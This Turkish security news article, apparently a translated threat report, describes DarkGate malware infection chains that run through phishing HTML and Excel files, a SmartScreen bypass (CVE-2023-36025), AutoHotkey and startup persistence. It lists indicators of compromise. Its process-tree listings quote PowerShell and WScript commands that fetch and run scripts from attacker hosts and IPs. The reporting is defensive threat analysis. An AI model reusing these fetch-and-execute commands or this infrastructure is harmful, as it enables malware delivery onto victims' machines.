Darkgate Zararlı Yazılımı Otomatik Kısayol Tuşundan Yararlanarak Ekipleri Takip Ediyor


Araştırmacılar DarkGate kötü amaçlı yazılımıyla ilişkili yeni bir enfeksiyon zincirini ortaya çıkardılar.

Borland Delphi kullanılarak geliştirilen bu Uzaktan Erişim Truva Atı (RAT), en az 2018’den bu yana Rusça bir siber suç forumunda Hizmet Olarak Kötü Amaçlı Yazılım (MaaS) teklifi olarak pazarlanıyor.

DarkGate kötü amaçlı yazılımı, süreç enjeksiyonu, dosya indirme ve yürütme, veri hırsızlığı, kabuk komut yürütme ve tuş kaydetme yetenekleri dahil olmak üzere bir dizi işlevselliğe sahiptir.

Araştırmacılar, aşağıdaki şekilde de gösterildiği gibi, son üç ayda DarkGate’in yayılmasında önemli bir küresel varlığa sahip endişe verici bir artış gözlemlediler:

DarkGate'in Coğrafi Dağılımı
DarkGate’in Coğrafi Dağılımı

Microsoft Defender SmartScreen’i Atlamak

Araştırmanın en önemli bulgularından biri, DarkGate kötü amaçlı yazılımının Microsoft Defender SmartScreen tarafından algılanmayı atlatabilmesidir.

Bu kaçırma taktiği, Microsoft’u, önceki yıl tespit edilen ve yamalanan temel güvenlik açığı CVE-2023-36025’i gidermek için bir yama yayınlamaya yöneltti.

Güvenlik açığı, İnternet Kısayolu (.url) dosyalarıyla ilgili uygun denetimlerin ve karşılık gelen istemlerin bulunmamasından kaynaklanıyor.

McAfee tarafından hazırlanan bir rapora göre siber saldırganlar, zararlı komut dosyalarını indirip çalıştırabilen kötü amaçlı .url dosyaları oluşturarak bu kusurdan yararlandı ve Windows Defender SmartScreen’in uyarı ve inceleme mekanizmalarından etkili bir şekilde kaçındı.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

Benzer şekilde, bu yıl araştırmacılar, İnternet Kısayol Dosyalarındaki güvenlik özelliğinin atlanmasına da izin veren başka bir güvenlik açığı olan CVE-2024-21412’yi belirlediler.

Microsoft o zamandan beri bu sorunu çözmek için bir yama yayımladı.

Enfeksiyon Zincirleri Açıklandı

Araştırmacılar aynı DarkGate kabuk kodunu ve yükünü taşıyan iki farklı başlangıç ​​vektörü belirlediler.

 Enfeksiyon Zinciri
Enfeksiyon Zinciri

İlk vektör bir HTML dosyasından kaynaklanırken ikincisi bir XLS dosyasıyla başlar.

İlgili mekanizmalarını ortaya çıkarmak için her zinciri ayrı ayrı inceleyelim.

HTML’den enfeksiyon

Bulaşma zinciri, Word belgesi gibi görünen bir kimlik avı HTML sayfasıyla başlıyor.

Kullanıcılardan belgeyi “Bulut Görünümü”nde açmaları isteniyor, bu da farkında olmayan kişilerin kötü amaçlı içerikle etkileşime girmesi için aldatıcı bir cazibe oluşturuyor.

HTML sayfası
HTML sayfası

“Bulut Görünümü” tıklandığında kullanıcılardan Windows Gezgini’ni açma izni vermeleri istenir, bu da sonraki yeniden yönlendirme işlemini kolaylaştırır.

Windows Gezgini'ne yönlendirmeyi onaylama istemi
Windows Gezgini’ne yönlendirmeyi onaylama istemi

Araştırmacılar, HTML dosyasının, dizeleri tersine çevirmek için tasarlanmış bir JavaScript işlevi içerdiğini keşfettiler; bu, kodlanmış verilerin kodunu çözme veya değiştirme girişimini akla getiriyor.

Daha ayrıntılı bir incelemenin ardından, görüntüde vurgulanan içeriğin ters Base64 formatında kodlanmış bir dize olduğunu buldular.

HTML kodunda Javascript
HTML kodunda Javascript

İçeriğin kodunun çözülmesi, “Report-26-2024.url” adlı bir dosya için arama işlemini yürütmek üzere “search-ms” uygulama protokolünü kullanan bir URL’yi ortaya çıkardı.

Aramayı kötü amaçlı WebDAV paylaşımı bağlamıyla sınırlandırmak ve kapsamını kısıtlamak için “kırıntı” parametresi kullanıldı.

WebDAV paylaşımı
WebDAV paylaşımı

.url dosyası, .url dosyasının yürütülmesi üzerine otomatik olarak yürütülecek bir VBScript dosyasına işaret eden bir URL parametresi içeriyordu.

Bu işlem, CVE-2023-36025 güvenlik açığından yararlanılarak sistemde kötü amaçlı komutların veya eylemlerin yürütülmesine izin verdi.

.URL dosyasının içeriği
.URL dosyasının içeriği

Araştırmacılar, VBScript dosyasının uzak bir konumdan bir komut dosyası alıp yürütmek için bir PowerShell komutunu çalıştıracağını gözlemledi.

Belge

Etkili Kötü Amaçlı Yazılım Analizi için ANY.RUN’u Şirketinize Entegre Edin

SOC, Tehdit Araştırması veya DFIR departmanlarından mısınız? Öyleyse 400.000 bağımsız güvenlik araştırmacısından oluşan çevrimiçi topluluğa katılabilirsiniz:

  • Gerçek Zamanlı Tespit
  • İnteraktif Kötü Amaçlı Yazılım Analizi
  • Yeni Güvenlik Ekibi Üyelerinin Öğrenmesi Kolay
  • Maksimum veriyle ayrıntılı raporlar alın
  • Linux’ta ve tüm Windows İşletim Sistemi Sürümlerinde Sanal Makineyi Kurma
  • Kötü Amaçlı Yazılımlarla Güvenli Bir Şekilde Etkileşim Kurun

Tüm bu özellikleri şimdi sanal alana tamamen ücretsiz erişimle test etmek istiyorsanız:

Bu komut dosyası daha sonra kötü amaçlı bir komut dosyasıyla birlikte AutoHotkey yardımcı programını indirip çalıştırmaya devam edecek ve sonuçta DarkGate yükünün yürütülmesine yol açacaktır.

Süreç ağacı
Süreç ağacı

Komut satırları aşağıdadır:

  • “C:\Windows\System32\WScript.exe” “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”
    • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Komut Çağırma İfadesi (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • “C:\rjtu\AutoHotkey.exe” C:/rjtu/script.ahk
      • “C:\Windows\system32\attrib.exe” +h C:/rjtu/

XLS enfeksiyonu

İkinci enfeksiyon vektörü, kötü amaçlı bir Excel (XLS) dosyasından kaynaklanıyor.

Kullanıcı “Aç” butonuna tıkladığında dosya açılmadan önce bir uyarı ekranı belirir.

XLS örneği
XLS örneği

Etkinliğe izin verildikten sonra araştırmacılar, Excel dosyasının uzak bir konumdan indirilen bir VBScript dosyasını çalıştırdığı, HTML tabanlı enfeksiyon zincirine benzer bir süreç ağacı gözlemlediler.

Excel dosyasından işlem ağacı
Excel dosyasından işlem ağacı

Komut satırları şunlardır:

  • “C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE” “C:\Users\admin\Documents\Cluster\10-apr-xls\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”
    • “C:\Windows\System32\WScript.exe” “\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
      • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Komut Çağırma İfadesi (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
        • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        • “C:\kady\AutoHotkey.exe” C:/kady/script.ahk
        • “C:\Windows\system32\attrib.exe” +h C:/kady/

Uzak komut dosyası, AutoHotkey yardımcı programı ve kötü amaçlı bir komut dosyası da dahil olmak üzere aynı dosya kümesini indirip çalıştırdı ve sonuçta DarkGate yükünü çalıştırdı.

Önceki zincire benzer uzak komut dosyası
Önceki zincire benzer uzak komut dosyası

Kalıcılık ve Sızma

Kalıcılığı korumak için kötü amaçlı yazılım, başlangıç ​​klasörüne bir .lnk dosyası bırakır ve bu dosya da “C:\ProgramData” dizinine “hakeede” adlı bir klasör bırakır.

Bu klasör, DarkGate yükünü çalıştırmak için yürütülen AutoHotkey betiği de dahil olmak üzere aynı dosya kümesini içerir.

Kalıcılık
Kalıcılık

Araştırmacılar ayrıca ağ iletişim analizinde gösterildiği gibi 5.252.177.207 IP adresine veri sızıntısı tespit etti.

Ağ İletişimi
Ağ İletişimi
IP adresi
IP adresi

DarkGate kötü amaçlı yazılımının, Microsoft Defender SmartScreen ve AutoHotkey yardımcı programındaki güvenlik açıklarından yararlanan gelişmiş enfeksiyon zinciri, siber suçlular tarafından kullanılan gelişen taktikleri öne çıkarıyor.

Araştırmacıların bulguları, sistemleri en son güvenlik yamalarıyla güncel tutmanın ve ortaya çıkan tehditlere karşı tetikte olmanın önemini vurguluyor.

Siber güvenlik ortamı geliştikçe bireylerin ve kuruluşların savunma stratejilerinde bilgili ve proaktif kalması gerekiyor.

Güvenlik uzmanları, DarkGate gibi kötü amaçlı yazılımların kullandığı teknikleri anlayarak daha etkili karşı önlemler geliştirebilir ve bu tür karmaşık ve kalıcı tehditlere karşı daha iyi koruma sağlayabilir.

Uzlaşma Göstergeleri (IoC’ler):

Dosya Doğramak
Html dosyası 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
URL dosyası 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
VBS 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
autohotkey.exe 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
AHK komut dosyası dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
test.txt 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
DarkGate.exe 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
IP 5.252.177.207
XLS dosyası 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
VBS 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
LNK dosyası 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
IP 103.124.106.237

Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo 



Source link